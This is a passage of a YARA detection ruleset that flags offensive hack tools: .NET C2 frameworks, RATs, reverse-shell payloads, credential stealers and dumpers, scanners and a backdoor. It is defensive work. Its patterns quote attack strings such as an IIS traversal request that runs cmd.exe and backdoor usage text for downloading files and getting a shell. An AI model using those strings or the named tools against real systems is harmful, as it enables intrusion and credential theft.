"Ghostpack-CompiledBinaries" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_metasploit_sharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/VolatileMindsLLC/metasploit-sharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "metasploit-sharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_trevorc2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/trustedsec/trevorc2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "trevorc2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_petaqc2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/fozavci/petaqc2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "petaqc2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_DNS2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_DNS2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_cve_2017_7269_tool { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/zcgonvh/cve-2017-7269-tool" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "cve-2017-7269-tool" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AggressiveProxy { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/EncodeGroup/AggressiveProxy" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AggressiveProxy" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MSBuildAPICaller { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/rvrsh3ll/MSBuildAPICaller" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MSBuildAPICaller" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_GrayKeylogger { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DarkSecDevelopers/GrayKeylogger" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "GrayKeylogger" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_weevely3 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/epinna/weevely3" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "weevely3" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_FudgeC2 { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Ziconius/FudgeC2" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "FudgeC2" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_Reverse_tcp { meta: description = "Detects .NET red/black-team tools 
via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_Reverse_tcp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* NOTE(review): in this rendering several string literals are wrapped across a line boundary (meta strings in HKTL_Solarwinds_credential_stealer, PScan_Portscan_1, PortScanner, IP_Stealing_Utilities and Tiny_Network_Tool_Generic; pattern strings $s3 in stealth_Stealth, $s2 in Powershell_Netcat and $s2 in Ncat_Hacktools_CN). A YARA text literal cannot contain a raw newline, so restore those lines from the upstream file before compiling this copy. */ /* The HKTL_NET_NAME_* rules below pair the project name with "AssemblyTitle" (the attribute name embedded in most compiled .NET assemblies) behind an MZ/PE header check, so in practice any .NET PE that carries the project name matches; short generic names such as "tvasion", "reconness" or "C2Bridge" can collide with unrelated builds. Treat a hit as a triage lead for the named tool, not a verdict. */ rule HKTL_NET_NAME_SharpHose { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/ustayready/SharpHose" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpHose" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RAT_NjRat_0_7d_modded_source_code { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RAT-NjRat-0.7d-modded-source-code" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RdpThief { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/0x09AL/RdpThief" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RdpThief" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RunasCs { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/antonioCoco/RunasCs" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RunasCs" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_IP6DNS { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS" 
author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_IP6DNS" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_ARP { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_ARP" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_C2Bridge { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/cobbr/C2Bridge" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "C2Bridge" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Infrastructure_Assessment { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Infrastructure-Assessment" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_shellcodeTester { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/tophertimzen/shellcodeTester" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "shellcodeTester" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_gray_hat_csharp_code { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/brandonprry/gray_hat_csharp_code" author = "Arnim Rupp" date = "2021-01-22" strings: $name = 
"gray_hat_csharp_code" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_NativePayload_ReverseShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "NativePayload_ReverseShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_DotNetAVBypass { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mandreko/DotNetAVBypass" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "DotNetAVBypass" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_HexyRunner { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/bao7uo/HexyRunner" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "HexyRunner" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpOffensiveShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/darkr4y/SharpOffensiveShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpOffensiveShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_reconness { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/reconness/reconness" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "reconness" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 
0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_tvasion { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/loadenmb/tvasion" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "tvasion" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ibombshell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Telefonica/ibombshell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ibombshell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RemoteProcessInjection { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RemoteProcessInjection" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_njRAT_0_7d_Stub_CSharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NYAN-x-CAT/njRAT-0.7d-Stub-CSharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "njRAT-0.7d-Stub-CSharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_CACTUSTORCH { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mdsecactivebreach/CACTUSTORCH" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "CACTUSTORCH" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_PandaSniper { meta: 
description = "Detects .NET red/black-team tools via name" reference = "https://github.com/QAX-A-Team/PandaSniper" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "PandaSniper" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_xbapAppWhitelistBypassPOC { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "xbapAppWhitelistBypassPOC" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_StageStrike { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/RedXRanger/StageStrike" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "StageStrike" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* $certificate is mandatory in the condition, so a stealer that does not embed "CN=SolarWinds-Orion" is not covered even when it touches the credential files or SQL columns. The repeated "reference" and "hash" meta keys compile, but tooling that exposes meta as a dictionary (e.g. yara-python) keeps only the last value of each. */ rule HKTL_Solarwinds_credential_stealer { meta: description = "Detects solarwinds credential stealers like e.g. 
solarflare via the touched certificate, files and database columns" reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" reference = "https://github.com/mubix/solarflare" author = "Arnim Rupp" date = "2021-01-20" hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4" hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc" strings: $certificate = "CN=SolarWinds-Orion" ascii nocase wide $credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide $credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide $credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide $credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide $sql1 = "encryptedkey" ascii nocase wide fullword $sql2 = "protectiontype" ascii nocase wide fullword $sql3 = "CredentialProperty" ascii nocase wide fullword $sql4 = "passwordhash" ascii nocase wide fullword $sql5 = "credentialtype" ascii nocase wide fullword $sql6 = "passwordsalt" ascii nocase wide fullword condition: uint16(0) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* THOR APT Scanner - Hack Tool Extract This ruleset is a subset of all hack tool rules included in our APT Scanner THOR - the full featured APT scanner. 
We will frequently update this file with new rules rated TLP:WHITE Florian Roth BSK Consulting GmbH Web: bsk-consulting.de revision: 20150510 License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/ */ /* WCE */ /* $a ("extract the TGT session key") is also $e in Amplia_Security_Tool below, so a WCE sample fires both rules. */ rule WindowsCredentialEditor { meta: description = "Windows Credential Editor" threat_level = 10 score = 90 strings: $a = "extract the TGT session key" $b = "Windows Credentials Editor" condition: $a or $b } rule Amplia_Security_Tool { meta: description = "Amplia Security Tool" score = 60 nodeepdive = 1 strings: $a = "Amplia Security" $b = "Hernan Ochoa" $c = "getlsasrvaddr.exe" $d = "Cannot get PID of LSASS.EXE" $e = "extract the TGT session key" $f = "PPWDUMP_DATA" condition: 1 of them } /* pwdump/fgdump */ rule PwDump { meta: description = "PwDump 6 variant" author = "Marc Stroebel" date = "2014-04-24" score = 70 strings: $s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa" $s6 = "Unable to query service status. Something is wrong, please manually check the st" $s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword condition: all of them } rule PScan_Portscan_1 { meta: description = "PScan - Port Scanner" author = "F. 
Roth" score = 50 strings: $a = "00050;0F0M0X0a0v0}0" $b = "vwgvwgvP76" $c = "Pr0PhOFyP" condition: all of them } /* "1 of them" over 26 loosely related strings: generic entries such as "Dumping password" or "samdump.dll" can also surface in security tooling and documentation, so keep the score of 50 in mind when alerting on a single-string hit. */ rule HackTool_Samples { meta: description = "Hacktool" score = 50 strings: $a = "Unable to uninstall the fgexec service" $b = "Unable to set socket to sniff" $c = "Failed to load SAM functions" $d = "Dump system passwords" $e = "Error opening sam hive or not valid file" $f = "Couldn't find LSASS pid" $g = "samdump.dll" $h = "WPEPRO SEND PACKET" $i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4" $j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE" $k = "arpspoof\\Debug" $l = "Success: The log has been cleared" $m = "clearlogs [\\\\computername" $n = "DumpUsers 1." $o = "dictionary attack with specified dictionary file" $p = "by Objectif Securite" $q = "objectif-securite" $r = "Cannot query LSA Secret on remote host" $s = "Cannot write to process memory on remote host" $t = "Cannot start PWDumpX service on host" $u = "usage: %s <system hive> <security hive>" $v = "username:domainname:LMhash:NThash" $w = "<server_name_or_ip> | -f <server_list_file> [username] [password]" $x = "Impersonation Tokens Available" $y = "failed to parse pwdump format string" $z = "Dumping password" condition: 1 of them } /* Disclosed hack tool set */ rule Fierce2 { meta: author = "Florian Roth" description = "This signature detects the Fierce2 domain scanner" date = "07/2014" score = 60 strings: $s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars," condition: 1 of them } rule Ncrack { meta: author = "Florian Roth" description = "This signature detects the Ncrack brute force tool" date = "07/2014" score = 60 strings: $s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via" condition: 1 of them } /* Source-code signature written against the Python 2 "except X, ex:" form; a sqlmap tree that spells this with "as" would not match. */ rule SQLMap { meta: author = "Florian Roth" description = "This signature detects the SQLMap SQL injection tool" date = "07/2014" score = 60 strings: $s1 = "except SqlmapBaseException, ex:" condition: 1 of them } /* The yarGen rules that follow (PortScanner through crack_Loader) are keyed to the sample named in "hash" and mostly use opaque byte runs from that build, so they identify that exact file rather than the tool family. */ rule PortScanner { meta: description = "Auto-generated 
rule on file PortScanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "b381b9212282c0c650cb4b0323436c63" strings: $s0 = "Scan Ports Every" $s3 = "Scan All Possible Ports!" condition: all of them } rule DomainScanV1_0 { meta: description = "Auto-generated rule on file DomainScanV1_0.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "aefcd73b802e1c2bdc9b2ef206a4f24e" strings: $s0 = "dIJMuX$aO-EV" $s1 = "XELUxP\"-\\" $s2 = "KaR\"U'}-M,." $s3 = "V.)\\ZDxpLSav" $s4 = "Decompress error" $s5 = "Can't load library" $s6 = "Can't load function" $s7 = "com0tl32:.d" condition: all of them } rule MooreR_Port_Scanner { meta: description = "Auto-generated rule on file MooreR Port Scanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "376304acdd0b0251c8b19fea20bb6f5b" strings: $s0 = "Description|" $s3 = "soft Visual Studio\\VB9yp" $s4 = "adj_fptan?4" $s7 = "DOWS\\SyMem32\\/o" condition: all of them } rule NetBIOS_Name_Scanner { meta: description = "Auto-generated rule on file NetBIOS Name Scanner.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "888ba1d391e14c0a9c829f5a1964ca2c" strings: $s0 = "IconEx" $s2 = "soft Visual Stu" $s4 = "NBTScanner!y&" condition: all of them } rule FeliksPack3___Scanners_ipscan { meta: description = "Auto-generated rule on file ipscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "6c1bcf0b1297689c8c4c12cc70996a75" strings: $s2 = "WCAP;}ECTED" $s4 = "NotSupported" $s6 = "SCAN.VERSION{_" condition: all of them } rule CGISscan_CGIScan { meta: description = "Auto-generated rule on file CGIScan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "338820e4e8e7c943074d5a5bc832458a" strings: $s1 = "Wang Products" fullword wide $s2 = "WSocketResolveHost: Cannot convert host address '%s'" $s3 = "tcp is the only protocol supported thru socks server" condition: all of ($s*) } rule IP_Stealing_Utilities { meta: description = "Auto-generated rule on file IP 
Stealing Utilities.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "65646e10fb15a2940a37c5ab9f59c7fc" strings: $s0 = "DarkKnight" $s9 = "IPStealerUtilities" condition: all of them } rule SuperScan4 { meta: description = "Auto-generated rule on file SuperScan4.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "78f76428ede30e555044b83c47bc86f0" strings: $s2 = " td class=\"summO1\">" $s6 = "REM'EBAqRISE" $s7 = "CorExitProcess'msc#e" condition: all of them } rule PortRacer { meta: description = "Auto-generated rule on file PortRacer.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "2834a872a0a8da5b1be5db65dfdef388" strings: $s0 = "Auto Scroll BOTH Text Boxes" $s4 = "Start/Stop Portscanning" $s6 = "Auto Save LogFile by pressing STOP" condition: all of them } /* Single-string rule: the literal is a well-known IIS traversal request that also appears in IDS signature sets and scanner test data, so expect hits on security tooling as well. */ rule scanarator { meta: description = "Auto-generated rule on file scanarator.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "848bd5a518e0b6c05bd29aceb8536c46" strings: $s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" condition: all of them } rule aolipsniffer { meta: description = "Auto-generated rule on file aolipsniffer.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "51565754ea43d2d57b712d9f0a3e62b8" strings: $s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB" $s1 = "dwGetAddressForObject" $s2 = "Color Transfer Settings" $s3 = "FX Global Lighting Angle" $s4 = "Version compatibility info" $s5 = "New Windows Thumbnail" $s6 = "Layer ID Generator Base" $s7 = "Color Halftone Settings" $s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca" condition: all of them } rule _Bitchin_Threads_ { meta: description = "Auto-generated rule on file =Bitchin Threads=.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "7491b138c1ee5a0d9d141fbfd1f0071b" strings: $s0 = "DarKPaiN" $s1 = "=BITCHIN THREADS" condition: all of them } rule cgis4_cgis4 { meta: description = "Auto-generated rule on file cgis4.exe" 
author = "yarGen Yara Rule Generator by Florian Roth" hash = "d658dad1cd759d7f7d67da010e47ca23" strings: $s0 = ")PuMB_syJ" $s1 = "&,fARW>yR" $s2 = "m3hm3t_rullaz" $s3 = "7Projectc1" $s4 = "Ten-GGl\"" $s5 = "/Moziqlxa" condition: all of them } rule portscan { meta: description = "Auto-generated rule on file portscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "a8bfdb2a925e89a281956b1e3bb32348" strings: $s5 = "0 :SCAN BEGUN ON PORT:" $s6 = "0 :PORTSCAN READY." condition: all of them } rule ProPort_zip_Folder_ProPort { meta: description = "Auto-generated rule on file ProPort.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "c1937a86939d4d12d10fc44b7ab9ab27" strings: $s0 = "Corrupt Data!" $s1 = "K4p~omkIz" $s2 = "DllTrojanScan" $s3 = "GetDllInfo" $s4 = "Compressed by Petite (c)1999 Ian Luck." $s5 = "GetFileCRC32" $s6 = "GetTrojanNumber" $s7 = "TFAKAbout" condition: all of them } rule StealthWasp_s_Basic_PortScanner_v1_2 { meta: description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "7c0f2cab134534cd35964fe4c6a1ff00" strings: $s1 = "Basic PortScanner" $s6 = "Now scanning port:" condition: all of them } rule BluesPortScan { meta: description = "Auto-generated rule on file BluesPortScan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "6292f5fc737511f91af5e35643fc9eef" strings: $s0 = "This program was made by Volker Voss" $s1 = "JiBOo~SSB" condition: all of them } rule scanarator_iis { meta: description = "Auto-generated rule on file iis.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "3a8fc02c62c8dd65e038cc03e5451b6e" strings: $s0 = "example: iis 10.10.10.10" $s1 = "send error" condition: all of them } rule stealth_Stealth { meta: description = "Auto-generated rule on file Stealth.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa" strings: $s3 = "<table 
width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>" $s6 = "This tool may be used only by system administrators. I am not responsible for " condition: all of them } rule Angry_IP_Scanner_v2_08_ipscan { meta: description = "Auto-generated rule on file ipscan.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "70cf2c09776a29c3e837cb79d291514a" strings: $s0 = "_H/EnumDisplay/" $s5 = "ECTED.MSVCRT0x" $s8 = "NotSupported7" condition: all of them } rule crack_Loader { meta: description = "Auto-generated rule on file Loader.exe" author = "yarGen Yara Rule Generator by Florian Roth" hash = "f4f79358a6c600c1f0ba1f7e4879a16d" strings: $s0 = "NeoWait.exe" $s1 = "RRRRRRRW" condition: all of them } rule CN_GUI_Scanner { meta: description = "Detects an unknown GUI scanner tool - CN background" author = "Florian Roth" hash = "3c67bbb1911cdaef5e675c56145e1112" score = 65 date = "04.10.2014" strings: $s1 = "good.txt" fullword ascii $s2 = "IP.txt" fullword ascii $s3 = "xiaoyuer" fullword ascii $s0w = "ssh(" fullword wide $s1w = ").exe" fullword wide condition: all of them } /* All four strings are routine CRT/Winsock import names; the filesize window (70KB-180KB) is the only real discriminator, which the score of 40 reflects. */ rule CN_Packed_Scanner { meta: description = "Suspiciously packed executable" author = "Florian Roth" hash = "6323b51c116a77e3fba98f7bb7ff4ac6" score = 40 date = "06.10.2014" strings: $s1 = "kernel32.dll" fullword ascii $s2 = "CRTDLL.DLL" fullword ascii $s3 = "__GetMainArgs" fullword ascii $s4 = "WS2_32.DLL" fullword ascii condition: all of them and filesize < 180KB and filesize > 70KB } /* Duplicate string values: $x5 repeats $y2 ("atoi") and $z1..$z3 repeat $x1, $x2 and $x4. Harmless for matching, just redundant. */ rule Tiny_Network_Tool_Generic { meta: description = "Tiny tool with suspicious function imports. 
(Rule based on WinEggDrop Scanner samples)" author = "Florian Roth" date = "08.10.2014" score = 40 type = "file" hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07" hash1 = "cafc31d39c1e4721af3ba519759884b9" hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92" strings: $magic = { 4d 5a } $s0 = "KERNEL32.DLL" fullword ascii $s1 = "CRTDLL.DLL" fullword ascii $s3 = "LoadLibraryA" fullword ascii $s4 = "GetProcAddress" fullword ascii $y1 = "WININET.DLL" fullword ascii $y2 = "atoi" fullword ascii $x1 = "ADVAPI32.DLL" fullword ascii $x2 = "USER32.DLL" fullword ascii $x3 = "wsock32.dll" fullword ascii $x4 = "FreeSid" fullword ascii $x5 = "atoi" fullword ascii $z1 = "ADVAPI32.DLL" fullword ascii $z2 = "USER32.DLL" fullword ascii $z3 = "FreeSid" fullword ascii $z4 = "ToAscii" fullword ascii condition: ( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB } rule Beastdoor_Backdoor { meta: description = "Detects the backdoor Beastdoor" author = "Florian Roth" score = 55 hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a" strings: $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword $s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword $s2 = "http://IP/a.exe a.exe -->Download A File" fullword $s7 = "Host: wwp.mirabilis.com:80" fullword $s8 = "%s -Set Port PortNumber -->Set The Service Port" fullword $s11 = "Shell -->Get A Shell" fullword $s14 = "DeleteService ServiceName -->Delete A Service" fullword $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword $s17 = "%s -Set ServiceName ServiceName -->Set The Service Name" fullword condition: 2 of them } rule Powershell_Netcat { meta: description = "Detects a Powershell version of the Netcat network hacking tool" author = "Florian Roth" score = 60 date = "10.10.2014" strings: $s0 = "[ValidateRange(1, 65535)]" fullword $s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword $s2 = "$Buffer = New-Object -TypeName System.Byte[] 
-ArgumentList $Client.ReceiveBufferSize" fullword condition: all of them } rule Chinese_Hacktool_1014 { meta: description = "Detects a chinese hacktool with unknown use" author = "Florian Roth" score = 60 date = "10.10.2014" hash = "98c07a62f7f0842bcdbf941170f34990" strings: $s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide $s1 = "msctls_progress32" fullword wide $s2 = "Reply-To: %s" fullword ascii $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii $s4 = "html htm htx asp" fullword ascii condition: all of them } rule CN_Hacktool_BAT_PortsOpen { meta: description = "Detects a chinese BAT hacktool for local port evaluation" author = "Florian Roth" score = 60 date = "12.10.2014" strings: $s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii $s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii $s2 = "@echo off" ascii condition: all of them } rule CN_Hacktool_SSPort_Portscanner { meta: description = "Detects a chinese Portscanner named SSPort" author = "Florian 